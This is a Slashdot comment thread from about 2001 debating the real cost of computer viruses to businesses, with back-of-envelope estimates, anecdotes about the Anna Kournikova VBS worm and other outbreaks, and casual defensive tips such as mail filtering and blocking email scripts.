How Much Do Computer Virus Attacks Really Cost?

An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.

Data point: $10/computer/year

I provide tech support for about 20 clients. These include individual home office users, small non-networked offices, a 50-station NT network, and a 10-station W95 peer network. Neither of these networks have any significant firewalling beyond what NAT provides, and their virus scanners aren't updated very often. Maybe 200 computers altogether. In the course of a year, I see perhaps 3 infections, averaging a couple of computers per infection. Cost to remedy, maybe $500 altogether. Cost of preventative measures, maybe another $1000. I don't know about lost time, but the damage is rarely serious, most of the lost time is due to panic. At a guess, worker time lost at at a couple of hours per computer affected (they may lose more time at the computer than that, but usually aren't just sitting there with their thumb up their nose). $20/hr*4hr*6 people=$480, +$500+$1000=$1980. $10/computer/year.

zero cost if you run IBM OS/2

Your costs will be zero if you use IBM OS/2 Warp. I have never had a virus in the last ten years. Rene

Re:What does reputation cost?

I think this is an excellent example of a cost MANY people in /. are forgetting to calculate in to their figures. I have received a couple e-mails from my father warning me about possible virii he has sent out because they were dleivered to his company. He had sent out this e-mai lto myself as well as his clients and other busniess contacts. I don't know if it cost the company any money but the possibility still exists. Also, I'd like to point out that educating users is STILL a cost incurred by a virus. The benefit is, hopefully, users will better protect themselves and the cost the business inucrs for the next virus that attacks them will be much less or nothing at all as their users were educated and better prepared to handle the situation themselves.

Re:Stupidity

Easy, they have a free online scanning service, and I am sure it is phoning home with statistics, etc. I would imagine that all of the antivirus software, and all of Microsofts software has backdoors in it where they can gain information...

*yawn*

[The+Man]

It costs this, it costs that. So what? There's an easy solution: drop windows. Failing that, put a statement into your new hire/contractor terms of employment agreement to the effect that:

It is company policy not to open electronic mail messages containing attachments, or to receive or transmit electronic messages of a non-work-related nature. It is agreed by all parties that violating this policy will result in immediate dismissal.

Re:How do you calculate lost WASTED time?

[Stormie]

If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...

Lord knows my morale plummeted this morning when I discovered that the hot nude pic of Anna Kournikova that somebody had emailed me was, in fact, just some lame Windows virus..

Virus cost? What about Windows cost?

[caldodge]

At my former employer, Microsoft Outbreak (tm) is NOT used for email, so they're not quite as vulnerable to virii as the typical workplace.

We spent much more time dealing with Windows-related problems (with 80 users, wipe and reinstall Win9x on 2-3 machines per month) than we did with viruses. So I'd like to see a study on the labor costs of using Windows - it might dwarf the cost of virus infections.

How much did US Buisnesses gain?

[McBeth]

What about the buisness that Symantec, MacAffe, and whoever else is in the anti-virus buisness. How much did they pull in for their software? I think that would be much more interesting

that depends on

[peterjm]

how much you would give me for my sanity.
the first thing that goes when the next big virus hits my company is my sanity.
this is because multiple messages are sent to all saying

"the message with as a subject line is a virus, don't open it. get your virus update here"

and then you see 10 messages right after it with the afore mentioned subject.

I don't know why these people have an email account anyway, they can't f*cking read.

I hate monday.

Here you have, ;o)

damnit.

Re:How much do virus *myths* cost businesses?

[Niac]

Or, a clue-by-four.
"We have the right to believe at our own risk any hypothesis that is live enough to tempt our will."

Re:The real cost of viruses... $$ AND time

[Evangelion]

Viruses cost people time - time that they could be working on something else, like "real work", not maintence.

Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenence?

--

doesn't cost a dime

[doobie]

Remember your monthly maintance on your Windows box, reinstall it monthly....most people don't....so they are saving money by NOT...viruses are a method to force users into submission of reinstalling Windows.

zero cost

[ragnar]

It doesn't cost my company anything because we don't use Windows. Simple. Problem solved.

Re:How much do virus *myths* cost businesses?

[jbert]

Amusingly enough this is a '4x2' in the UK. (Pronounced "Four be two" if you want to be taken seriously)

Re:The real cost of viruses...

[Darkstorm]

Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".



Just a thought here. But doesn't it seem odd that ever 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?

Now most of these viruses don't do allot of damage like the good old viruses that ate the hd as fast as possible. But from what I've seen there is one cost I haven't seen mentiond yet...the virus checker. Ok they aren't teribly expensive, but most people who get these viruses and lack an IT Dept go buy the latest virus checker to fix the problem. Seems like the companies that make virus checkers are quite happy whenever there is a big virus that gets into all the "dense" peoples computers.

Which brings me to the thought of "what if the virus checker companies made and distributed the virus?". Good for sales, keeps them in business, and keeps the fear alive. But since I don't know anyone working for any of these companies I couldn't give any proof. But it still seems suspitious.

Prefixing the rules

[leonbrooks]

Unfortunately, due to politics, the staff where I work get mail off an OpenVMS box, so there's no sendmail rules to kill it. The sparcs the other departments use have to have an admin modify rulesets.

I'd be quite surprised if SendMail doesn't run under VMS and maybe PostFix does as well... either way, sneak another box into the loop as a ``firewall'' for your problem child, and preprocess any inbound email before it gets there.

Noy doing its job

[leonbrooks]

If yu kan und3rstand m3, th3n the languag3 is d0ing itz job suffficiently, yes?

No, the holographic error-skipping logic built into that complicated and generally impossible wad of unset cement which we like to call ``our brains'' is doing its job. True, you need to have the odd error to keep it exercised, but if you have a common standard for language and stick to it, less expensive/embarrassing/frustrating mistakes are made. English is not particularly error-tolerant. Borking around with it makes it worse, like using slang and funny accents can make a potentially fuzzy and faded tape recording harder to understand.

Re:How much do virus *myths* cost businesses?

[whydna]

Actually, I'm pretty sure a 2x4 is about 1.75 x 3.5 inches. (approx. 4.4 cm x 8.9 cm ). Additionally they're sold in varying lengths. The typical "stud" length is 7'8.5" (or about 2.35 meters) and is usually used in the framework of walls. They're also sold in longer lengths (i think 18 feet (5.5m) is about the limit... ).

I use Macs. Total cost $0.00

[crovira]

Read it and weep. Script kiddies are too ignorant to do damage on anything their tools can't handle.

Re:Opportunity cost

[Pig+Hogger]

Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.

More croporate oxdung. Management incompetent enough to not guard properly against viruses certainly do not deserve the oodles of money they OUGHTA make if they didn't get attacked by the virus.

--

how timely

[kneeo]

Our company just got hit with an email virus,
AnnaKournikova.
Had to shut our exchange server down.
nice.

Oh that's nothing, imagine what car crashes cost

[afniv]

I'll bet that's a tiny amount compares too, say, car crashes.

How much money do I have to spend for air bags, seat belts, good tires, anti-lock brakes, bumpers, safety glass, energy absorbing body, car insurance and more air bags? That doesn't include damaged cars in actual accidents. I spend all that money on the expectation that I will be in an accident. I imagine coporate losses include all the "insurance". I would think the only costs a company pays for is some lost productivity and some bandwidth loss. But all the insurance seams to get included.

I was just spamed by a virus in Outlook this morning. Now I can't find my real e-mail....

~afniv
"Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"

Re:The real cost of viruses...

[Sleepyguy]

can anyone else smell the shit this guy is full of.

I work for a smallish (70 person) company that, unfortunatly, uses exchage/outlook to handle mail. Our systems staff is very dilligent, geting filters in place in a matter of hours on our exchange server. However one of these little vbs viruses did get through (through an employees personal hotmail account he was reading with Outlook Express.. i know i know don't get me started)

How long did it take. Well lesse, first things first. The vector had a bunch of drives mapped and this particular virus liked to overwrite HTML JPEGs GIFs and a few other filetypes with itself. So us being a webshop ... there goes the a few of the webroots.

The exchange server got shut down. For reasons that Im not privey to, however I fully agree with this decision. It could be possible that a variant could slip through during the extermination period.

So basicly what we had were two it people working 36 hours straight, to fix the webroots (which the devs were locked out of .. for good reason). So at their going rate (150$/hr) thats what about 10 grad. Ok so most of that time they wouldnt be doing anything billable .. I think they run at about 2 hours billable a day each so 600$ plus we gave them a couple of days off so ... 1200$ more.

total so far $1800.

So now we have a whole bunch of developers sitting on their ass. We have about 15 developers (at 175$/hr approx) now lets say that only 50% of them couldnt work (this is a bit conservative) because their web roots were thrashed and they had to wait a full 8 hour shift twiddling their thumbs thats 10 grand. plus the amount of work they lost that day (it happened at about noon so about 3 hours) thats another 4 grand. So 14K for the devs.

Now we devs dont use a ton of email, it doesnt slow us down that much when we dont have it .. however the project managers are pretty hosed. out of seven producers four were probly directly affected (their projects were on teh affected webroots) they probly lost as much as four hours a peice and the others probly lost two hours in lessened efficency because they dont have email and have to use the phone etc. so at (im not sure of the rate lets say 150$/hr) thats about $7000.

now im not even bringing in the designers (who are effected because their project manager is effected) or the potential lost business because of sales being denied their tools and their email. but just right there we have a total of about - $22,800 that is definatly wasted (not billable when it should be) and probly a whole lot more. and thats just a small shop of 70 people. Imagine what happens when it hits a huge shop like MS or AT&T. It's a freaking nightmare. I've seen shops like that shut down and send everyone home to make sure there are no reinfections.

_
b

virus vs spam

[Dionysus]

How come most /.'ers are falling over eachother telling how it's a) Microsoft's fault, b) users' fault, c) it doesn't really costs money (all excaggarated anyways), but when it comes to spam it suddenly cost money?

Both cases, admin can do something about it (reject spam mail by subscribing to MAPS, don't allow VBS attachments), and the user has to do something (delete the file when it arrives).

Could it be because viruses for the most part hits Microsoft OS, while spam affects everybody?

Hypocritical maybe?

Re:virus vs spam

[wbmccrea]

a) I do consider it to partly be Microsoft's fault because of the default behavior of their software (like outlook's "you got an executable as an attachment, can I please run it for you?"). If Look Out! (I consider outlook to be the worst offender) had a sane default behavior like, tell the user that attachments can do bad things, or if it was easier to change the behavior to "don't run executable attachments", then I wouldn't blame M$ anymore.

b) I think that most companies should have a policy of "educating the user about potential dangers of running attachments." That coupled with M$ fixing the default behavior of Look out! would really make it hard for a .VBS virus to replicate

c) I'm not disputing that virii cost money, but 17Billion dollars? I think that the monetary cost has been pulled out of thin air (just like the monetary cost of spam) to scare people.

Example: At my last job, I was a "Network Admin", and when the Melissa virus hit it didn't directly cost us anything (I was working for the Territorial government up in the Yukon at the time, and we had around 2500 users.) When we got the first call from an user about a "strange email", I got to go and talk to the client, and look at the message, while another admin checked to see if there was a new set of virus definitions for Exchange scan. After I determined that the user had received a copy of the Melissa virus (but the antivirus definitions on her machine were up to date, and the virus got cleaned), all that we had to do was change the logon scripts to do an update of the AV definitions for everyone. Total time spent dealing with that virus: 2 people for 1 hour (and dealing with virii was included as part of my job description, so there was "no real cost" other than the 15 minutes it took me to visit the user, and look at her computer (while she took her coffee break.))

I'm going to leave off here (I have to leave now)

The real question...

[Swano]

How many of the computer viruses out there come from (or are ordered by) antivirus compagnies? really??

Re:The real question...

[lemming552]

none. There's no need, plenty of viruses come from kits and the like outside of the AV companies.

Re:The real question...

[Quazion]

I think there are companies out there that make viruses to kick competitions, and that those viruses are writen by the virus scanner companies like norton and mcafee....

Example (this is fiction) Sun ordered the I Love U virus at mcafee to show how bad Outlook mail'a'like'irunscripts readers are, they paided up loads of money, mcafee is one of the first with a fix for it, so they make even extra money...and they try to blame someone in the philipines..

The facts if you ask me, more then 80% of the viruses are writen by commercial companies, hey man u asked for it ;D

Re:Personal estimate..

[Aphelion]

Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe)

So far so good ...

I only get $5 billion.

You forgot to mention that out of those 200 million computers in business use in the US, only a somewhat small (up to 20%?) number of them get infected. That could very well drop the estimate below the $1B marker-- can't have that!

An Easy Baseline:

[mengel]

Can't someone scrounge around and find out how much income the major virus scanning software companies make on that software every year?

For example, this article points out that Network Associates brought in about $9Million last quarter from McAfee.com, and this one claims that McAfee has 47% of the market; so that says that folks spent around $20Million last quarter on virus software alone -- assuming linear rates, that means $80Million last year...

Of course that doesn't count virus-scanning firewalls, and so on, much less peoples' time.

No, there is a cost.

[Weasel+Boy]

My group was hit by the "OnTheFly" virus this morning (see source elswhere in this thread). Figure on a couple of handfulls of engineers reading the attachment in their Unix-based mail readers and sending each other notes saying, "Hey, check out this virus!" At five minutes per engineer screwing around with this ineffectual Windows-based virus, we lost easily $100 in productivity.

Re:No, there is a cost.

[Woko]

One of our clients was hit by that this morning and our mailq jumped from a couple of hundred to 4700.... slowed things down a little.

And of course the accounts staff (who's PCs we can't administer) got the virus too....

sheeeesh

---

Re:"Loss" == "IRS allows you to write it off".

[swb]

If your time was billable it could be considered a loss. Where I work we bill all our time, even BS overhead time, to a job number. Most of my time goes to the "overhead" sink job number, but occasionally I work on projects for other profit centers and my time gets billed their job numbers.

If your company did time accounting in a similar way, your time spent fixing the mail system could get billed against a job number where that time spent not performing client billable work would be meaningful to the business. It might not account for an IRS loss, but it would be collected into a place where it mean something to the bean counters. With creative corporate structuring, it might actually BE a loss for the company.

Of course they'd just use it against you -- "Farnsworth, you racked up a lot of overhead time last month. One more month like that and we'll outsource you to IBM!"

Re:OnTheFly Source

[Quikah]

The first line of the code which is:
execute e7iqom5JE4z(...)

... Is the actual code. The rest of the message is the decrypter, created as function e7iqom5JE4z. So it calls e7iqom5JE4z to decrypt the code then executes it.

At least I think so, I haven't used VB in a while, I am kind of guessing what execute does but looks right to me.

This is making me nuts!

[anomaly]

We will never know the "real" costs of something like this because it is impractical to collect the data (and inaccurate - how do you measure productivity?)

Some costs that we incur for viruses:
1. I work for a major US corporation which spends lots of money on licenses each year for anti-virus software.

2. We have a person on staff (about 1/2 FTE) whose job it is to make sure that the virus definitions are up to date in our environment, to work with the AV software vendor to resolve issues with how the product is configured/installed - this must be done with each patch from the vendor, and is non-trivial.

3. We have to install the AV software on PCs when they are brought into out environment, and make sure that they have up to date virus definitions

4. We have to maintain an ftp site to store the virus definitions. You may say - they can just get it from the web! BZZZZT! wrong answer! There are WAN costs, internet bandwidth costs, as well as quality control issues -

5. We test AV definitions and engine changes before releasing them to the general public in our environment.

6. We have other people whose job it is to keep up with engine updates and virus definition updates for our file servers and email servers - probably at least another .5 FTE.

All of this is simply to prevent virus infections. Recently we had one regional office that hadn't gotten around to installing the AV software on their systems - this meant that they were not following our documented processes - and as a result all of the machines at the site lost all data on their hard drives.

This DID cost us money - we had to dispatch a recovery image to the site to get the machines working again, and the office was out of business for a couple of days until the PCs could be fixed.

We are a customer service business, and we lost revenue as well as customer goodwill by having an outage of services at this location. How much did that cost us? We will never know!

Another indirect cost is maintaining an internal mailing list for virus info. Everyone who keeps up to date with viruses reads the postings there, and that's a real cost of TIME our most valuable resource.

So, I have no good answer, but I know it's not a small number of dollars.

BTW - if we were running Linux, we'd still need to be concerned about these types of things. The more Linux users there are, the more demand there will be for the geek points involved in writing a worm or virus that spreads well.

Also, the cost of implementing Linux (or other reasonably secure OS in our environment) is not small.

By adding local security you run into additional issues like local accounts/passwords - software installation engineering, file/directory permissions, etc....

Linux is not the answer to that problem (nor is NT or W2K, or 9x.)

Just my .02

Re:How much do virus *myths* cost businesses?

[gehrehmee]

Then again, the statement has often been made that:
"How much did the Y2K *myth* cost businesses"

Re:The real cost of viruses...

[Interested+Guy]

I have been reading quite a bit about the Theory of Contraints. I think that this arguement is addressed by TOC theory... The truth is that there are few constraints within an organization, and it is the performance of those constraints that dictates how successful an organization will be. Money that is spent on the salaries and equipment everywhere else in the organization that is not a constaint will not convert into revenue. If the virus attacks cause the Security people to become the organization's constaint, then it starts costing a company money. Otherwise, people and resources become busier than they would be, but their time does not impact the bottom line.

My Company's Cost

[Khan]

Absolutly $0.00! "How is that possible!?" you ask? Well, for starters, we don't run any of the usual suspects that allow for virus proliferation like Outlook, Word, Exchange, etc. Second, a long time ago we installed AV software on EVERY machine that walks out the door and we update the dat files weekly. Also, a very handy little trick is to associate VBS with Notepad. It's amazing how nice that script looks in plain text ;)

hmmm...

[Bobzibub]

Microsoft (who's products are almost the sole hosts of the virii) had a revenue of about 22 billion that year. Coincidence? Cheers, -D

My *&^(*&^ Company

[abh]

All I know is that right now my entire company (leading manufacturer of graphics tablets in the world) is without email because our Exchange server is down because some idiot ran a vbs attachment.

Re:Stupidity

[The+Dakota+Kidd]

I'd say its proof that North Dakotans are smart enough to not open VB attachments.

And for the record, I currently live in North Dakota, we do have computers, phone lines, indoor plumbin', and we just got them new fangled horseless carriges last year.

Re:OnTheFly Source

[G-funk]

Damn! I got this one this morning (from some less than savvy person at an ex employer), unenctrypted it and whatnot... Missed out on 4 points! Mine's even indented and with (mostly)decent variable names! ;-)

Seriously tho, this one's not too dangerous. Remove the registry entry (just to be clean), reboot, and then delete the files, and it's gone.

It could have been a lot worse, which I stressed to the individual responsible for me getting it.


--Gfunk

Cost is relative

[MindStalker]

I personally hate it when people give figured for the "cost" of something or other to US buisnesses. Because if we can all remember every dollar spend is a dollar made by someone else. So if I have to pay a tech to come and fix all the computer, or buy better virus detection software. That isn't costing anything to US companies as a whole. Now if you want an acurate figure you would want to compute cost of total productivity because people couldn't get their work done. And once again you would have to look at increased productivity among people who solve virus problems :) But all in all I'm sure you could come up with some lost of total GDP just have to consider what a lose really is.

Re:Cost is relative

[gordguide]

Your analysis is essentially correct. This is a large factor in comparing most financial data; such as GNP, etc. Given two nearly identical entities (say, two nations, but could be anything similar) the least efficent will have the greater figure for GNP and GDP. The one with the greater need for fixes will distribute a given dollar many more times (companies will come to exist to fix problems, and each dollar is added each time it changes hands). However, if you are trying to save money in an individual enterprise, it is better if the fix is not needed in the first place.

Re:Hmm... Texas...

[DeanT]

There aren't any infected files in Nader states!

Refresh my memory. Which states would those be? :)

DeanT

Re:Next to nothing, if you're doing your job.

[NZheretic]

Add to that use of ghost ( http://www.ghost.com/ ) on win9X system. Any suspect viral activity and the user can re/netboot to clean/reinstall the client system.

Make sure to use only a clean/virgin system just for installing for generating disk images.

However all the above suggestions will not protect documents/files on the file servers that the user has access to from new viruses that the antivirus software does not yet detect or clean.

Cost of Anti-virus software .gt. costs of virus

[theMissingLink]

I have seen sales person's laptops that barely function thanks to a "popular" antivirus companies products. I have a similarly configured laptop running Linux that drives circles around theirs (and even when I boot into Win2k with no viri checking). One sales guy keeps sending his in for repair because it is soooo slooow. And these are new 800 MHz laptops.

The missing link's theory is that the time lost to running anti virus software is greater than the time lost to virus.

Case number two. I help support the computers and network in a marginally funded private school. Most of the desktops are 100 MHz Pentiums. Running anti-virus software makes these already slow machines unusable.

In about 6 months on the Internet the school has not lost computer availability (knock on wood).

Total Cost of Ownership

[Tony-A]

Calculate the REAL cost of Exchange/Outlook.

Is your bandwidth free??

[fuckface]

Not everybody is as lucky as you to have completely free data rates. Stupid troll.

Re:Opportunity cost

[jleader]

You're assuming that $1 in the future is worth $1 today. In reality, the farther into the future you look, the less a dollar then is worth today.

In other words, why not lend me a million bucks; I'll pay it all back in thirty years, OK? No? Why not?

A basic problem with all this is that people are making very approximate guesses, and then multiplying them by very large factors (the number of people/computers/companies in the state/country/world) to get impressive, but ultimately irrelevant, numbers. Integrating those numbers over time from now to infinity makes it even more impressive, but no more relevant.

Re:Stupidity

[Dexx]

Interesting how all of Canada has less than some states. Probably because virii can't handle the cold weather.

Re:Microsoft

[Quebec]

I agree a lot and worse, for quite a while now I'm asking myself why people don't sue Microsoft for it?
Is Microsoft free of any liabilities?

Re:How much do virus *myths* cost businesses?

[Tower]

And can be bought at "Ye Olde Lumbre Yarde Shoppe"... oh wait, that's not in the UK, only in the "Authentic" re-created villages around Williamsburg, VA...
--

Anti-Virus?

[fungus]

Prevent rather than fix. Make sure every workstation has an anti-virus with auto-virus-definition-update, this will save you from 95% of the viriis.

Re:The real cost of viruses...

[MadAhab]

I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.

I was with you til the last one. I mean, Barney. That's pretty bad.

But you are definitely right. Viruses don't affect me personally, but the folks who work with me need a little protection.

I just got John Hardin's procmail sanitizer for a procmail/sendmail setup and initially, it looks very good. You can get it at : ftp://ftp.rubyriver.com/pub/jhardin/antispam/procm ail-security.html

Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.

Some 'real' numbers

[jsfetzik]

Here is an example of where the numbers may come from.

Assume your company got hit by the LoveBug virus.

You decide to shut down all PC's because it is early in the day and you do not yet know how much damage the virus can do.

Assume your employees can not use their PC's for 2 hours.

Assume your employees cost you $30/hours.

Assume you have 500 employees.

So your cost of the virus is (2 hours)*($30/hour)*(500 employees) = $30000.

Multiply that by 1000 companies and you have now 'lost' 30 million dollars. Inflate your numbers a bit more and multiple by 10-20 virus attacks per year and you end up in the billions pretty quick.

There are also a few other 'costs' thrown in, such as the time it takes your staff to clean things up, the phone bills for associated calls, the bandwidth to download virus updates, etc. These are small cost relative to the lost time listed above.

Now this is just an example and it not meant to be typical, or even accurate. It does show where the numbers come from however.

You may also laugh at the down time of 2 hours, particualrly in retrospect, but it does happen. The company work for was very conservative and had everyone shut down their PC until they could all be checked by IT personel. This took almost 14 hours to accomplish and most people had no PC access for their entry 8 hour work day.

Norton AntiVirus

[CAIMLAS]

Let's see, at about 50$ a license, we have a decent starting point. Now, multiply that by every Windows machine in corporate America. Since I have no idea how many that is, let's say around 100 thousand, to keep it on the small side. Multiply 100 thousand by 50, and we have ourselves 5 million.

Now, consider the price of subscriptions to the update service.

Now, multiply that a couple times to add in corporate 'efficiency' and various other costs that a company can easily aquire, such as 'employee benefits' for finding such a good, cheap price on a virus solution.

Now, multiply the sum by 3 or so, since occasionally a new virus will get through, and erase a weeks worth of work from an engineer's drive which he hasn't backed up. At around 30$ an hour, 50 hours a week.

Now, considering that the amount of damage is probably multi-layerd, as well as overexagerated, we can then probably safely multiply that result by two as well.

It starts adding up pretty quickly, doesn't it?

-------
CAIMLAS

Re:Norton AntiVirus

[nitemayr]

The actual cost of a Norton license depends of the size of the install in many cases, usually the grater share of the cost goes into supporting the clueles sysadmins who assume the products (any one) works one way without rtfm. I've seen as little as 10 dollars per node on a 10 node install, it's all in the deal making skills of the buyer in that case...

Re:Inflated Costs explained

[AhNewBis]

Heh, not in management, but I'm just a few offices down...I guess the virus Managerius Stupidus is a little catchy.

Inflated Costs explained

[AhNewBis]

Simple. The costs are actually multiples of assumption that NO work has been done during the disinfection of the virus.

Assume if you will the following:

Small business of 200 employees.
IS/IT department of 5 people.
Virus infects 100 of the computers.

Now, disenfection isn't just enough. The user will have to back up all of his/her current relevant data, have it scanned, and then the machine is restored using Ghost or some such program. Then, the user has to retrieve their data again, set up any other software necessary (or have it set up for them by IS/IT), re-customize their computer, and get things running smoothly.

Now, where do the costs come in?

- 'Downtime' of employees having their systems restored
- 'Downtime' of employees recustomizing their system to working order
- Additional time paid to IS/IT just because of the virus

Ok, so 100 employees were infected. Say it takes about a half-hour for IS to ghost a machine (50 hours for all machines), and only 5 machines can be ghosted at a time because of the bandwidth tax on the poor network. 10 machines an hour, for a total of 50 IS/IT hours.

* FIRST COST: 50 IS/IT hours. *

Allright, then you have 100 employees that aren't billing for a total of 50 hours because of the time it takes to ghost the machines.

* SECOND COST: 50 worker hours. *

Now, you have the amount of time it takes for an employee to restore their machine is another hour per machine infected.

* THIRD COST: 100 worker hours. *

And lastly, you have the billable time that could have been charged to a client if those machines were up and running.

* FOURTH COST: 150 billed worker hours *

So the total is 50 IS/IT hours, 150 Worker pay hours, and 150 worker billed hours.

Say IS/IT gets paid $20/hour. Say workers get paid $20/hour. Say clients get charged $75/hour.

Let's add that up.
(20*50) = $ 1000
(20*150) = $ 3000
(75*150) = $11250

Total: $15250 for 100 infected machines.

Now, also realize that the workers aren't getting paid that much, and the clients aren't getting charged that much.

Now, let's change this to a law firm of 100 infected computers, with the exact same numbers as far as hours concerned.

Say IS/IT gets paid $50/hour. Say the workers get paid $75/hour. Say the clients get charged $200/hour.

(50*50) = $ 2500
(75*150) = $11250
(200*150) = $30000

Total: $43750 for 100 infected machines

Of course, scale that for extra precautions:

- Additional hours for backing up data
- Additional costs of Anti-Virus software
- Additional time costs (same rate) for scanning machines
- Additional time costs (same rate) for backing up data
- Ghosting *ALL* machines
- Costs of Memos, bulletins, et al regarding virus procedures.

Imagine that instead of just infected machines being ghosted, nearly all of the machines get ghosted. That's $100,000 for one working day. Of course, these things spend multiple days for multiple networks clearing data, so one medium-sized company can easily bill $5,000,000 to ILOVEYOU.

Technically, by Geek standards, IS/IT is doing their job (fixing machines). By our standards, their pay shouldn't be applied to squashing virii. Also, there should be other machines for all of the other drones to work on, and other tasks that don't require machines.

However, hardware and software isn't the issue. It's the time that clients are billed for, time is what workers get money for, and time that is lost in the eyes of the CEO/CFO. So, $5,000,000 is the combined amount of income that would have been exchanged (not earned, just exchanged) during that time. So, their losses come to $5 million.

Re:Inflated Costs explained

[hyperstation]

you're in management, aren't you? :)

--

Well, today with the anna kournokovia one...

[svallarian]

It cost our company an entire one half workday (105 employees). Since we can no longer send or receive emails,
we can only communicate via telephone, and with only 3 lines...well, you get the picture!

Re:OnTheFly Source

[svallarian]

How were you able to decode the encoded part of the virus?

Russia

[vladkrupin]

Since you mentioned Russia, notice that although we are blamed (rightfully) for a huge chunk of the world virus-creation, none of the whole big Russia is even highlighted on the map... See, we are virus immune!!! :)

(and yes, I *am* Russian, BTW)
-------------------------------------------- -----

Re:Russia

[markmoss]

Sounds like Russian computers can't run Windows. That doesn't make you totally immune (the very first majorly destructive virus was a Unix worm intended to make Unix administrators pay a little attention to security, and I have heard of exactly one Linux worm), but it certainly reduces your exposure.

Re:the gov

[jazman_777]

As a network administrator for a government agency, here's my take. I support 125 computers. I make a point to check my mail and the net several times daily to make sure the latest virus is (or isn't) out there. I have to spend time educating and re-educating 230 users about opening attachments.

Goodness gracious, we have a virus loose in our office right _now_. (Not a big deal, we're mostly software and engineer geeks only a few, so it's under control). One fellow went over to the secretary's desk and put a note on her monitor not to open "AnnaKornoukova.jpg.vbs". First thing she does: she opens it!

Re:Microsoft

[jazman_777]

Brilliant. And have you ever considered how much productivity is GAINED by having VBScript embeeded in email? My bet is that it would outweigh these silly 'viruses'.

You bet; I wrote a VB script that auto answers: "I have sent out some e-mails, and I am waiting for information." Keeps everybody off my back, and lets me get through all Slashdot threads. Now _there's_ a productivity tool!

Re:Virus cost:

[jazman_777]

Windows ME sells for 169.99 at Amazon.com

How is this offtopic? Windows is a graphical shell on a boot virus.

Send the bill to Anna.

[Katya]

If it wasn't about her being so darned attractive to computer geek guys, we'd never have these problems. ;)

Re:Send the bill to Anna.

[Moose4]

We got Anna'd here too. Personally, I'm trying to figure out why every single person that sent it to me was female. Not a single man opened that attachment. I think I'm skeered.

Re:Send the bill to Anna.

[ChelleyBean]

Well that explains why it might hit computer related businesses, but how the heck did it end up on our server? We don't have any computer geeks guys.

Re:Send the bill to Anna.

[ocbwilg]

No kidding. Right now, I'm thinking "Hmm...wonder where I can find some pics of Anna Kournikova..." After just having shut off incoming mail at the firewall until we can get an update for our Exchange servers AV software.

Re:Stupidity

[Meltr]

This shows only the number of infected files from each state. Obviously the more populous states have more infected files.

Re:Stupidity

[darkonc]

Obviously, it would be better to have a listing of infections per capita (or IPM (Infections per Million)). Nontheless, Canada -- with 30+M people seems to have a surprisingly low infection rate. compared to some of the US states -- despite having a similar computer usage rate to the USA.
--

Re:Microsoft

[kaphka]

When you get right down to it, it's really Intel's fault. Their CPUs will run any code, without giving any thought to security... the code might be a virus, or a trojan that formats your hard drive, or a politically unacceptable web browser, or anything! All you have to do is send somebody a a malicious program, and *boom* - all their work is gone.

Of course, any good sysadmin knows that you can prevent these outbreaks by simply not allowing any executable files on your network.

Re:Microsoft

[kaphka]

Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...

Protection is different from security, though. No matter how "secure" it is, no system can prevent a program from doing something that a user can do. I.e. sending email, tampering with files (subject to the user's permissions,) etc.

Re:Huh?

[kaphka]

Any good sysadmin knows that you can prevent these outbreaks by simply not allowing any computers on your network.

Since no one is reading this thread anymore anyway, I'll indulge myself by stating the obvious: You know that I was being sarcastic, right?

What is sad...

[Dwonis]

Is that all these costs are directly the fault of Microsoft. The VBS worms are made possible by Microsoft's MUA design, and the other kinds of viruses are made possible by Microsoft's everyone-and-their-grandma-is-root OS design policy.

Now ask yourself: which would cost more? Using MS operating systems, or contracting a team of programmers to write all the software you need for a 'nix system?
--------
Genius dies of the same blow that destroys liberty.

Re:The real cost of viruses... $$ AND time

[UnknownSoldier]

> The main element in any calculation of this kind is "time",

Correct, because that is what money is: something that denotes "compressed time"

> that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

If I have to spend time cleaning up the virus, be it downloading the latest virus definations, or running a system wide virus check, then the *TIME* I am NOT working on producing something, *IS* the cost.

Viruses cost people time - time that they could be working on something else, like "real work", not maintence.

You have a point - the virus checking should be scheduled late at nite. But everyone turns there computers off when they leave for home, since it makes a noticable difference in the companies electric bill.

Cheers

It must add up

[amnesty]

Today where I work was hit by your standard email remailing virus. You know the kind -- attachment annakournikova.jpg.vbs, that when opened runs that nasty VBScript that emails everyone on your list.

Such a simple, dumb, preventable 'virus', which is nothing more than a simple VBScript than a real virus, cost us a lot. All of the email movement had to be frozen to keep the email service alive. Not being able to communicate with our clients is suicide in what we do (though I won't elaborte on who I work for). Not to mention the lost hours of productivity with much of our IT staff running around to get this thing fixed.

Such a dumb, simple, problem, and it shut us down for a whole day. I don't know how much money that was worth, but I can guarantee you, it was a lot.

(NB -- Yes, yes, turn of VBScript, etc. etc. But I'm not the one making the security decisions...)

Re:OnTheFly Source

[Eeeeegon]

Was that the AnnaKournakova.jpg.vba virus? One of our partner companies was infected with that as well .... good thing the virus-writer wasn't smart enough to put a later date in there.

Macafee has a page dedicated to removing this virus, fyi.

By the way, for all of ye running Outlook, you can turn the security setting from 'Internet' to 'Restricted' to prevent running scripts from email attachments. er.. at least, there's a warning before doing so.

-Egon

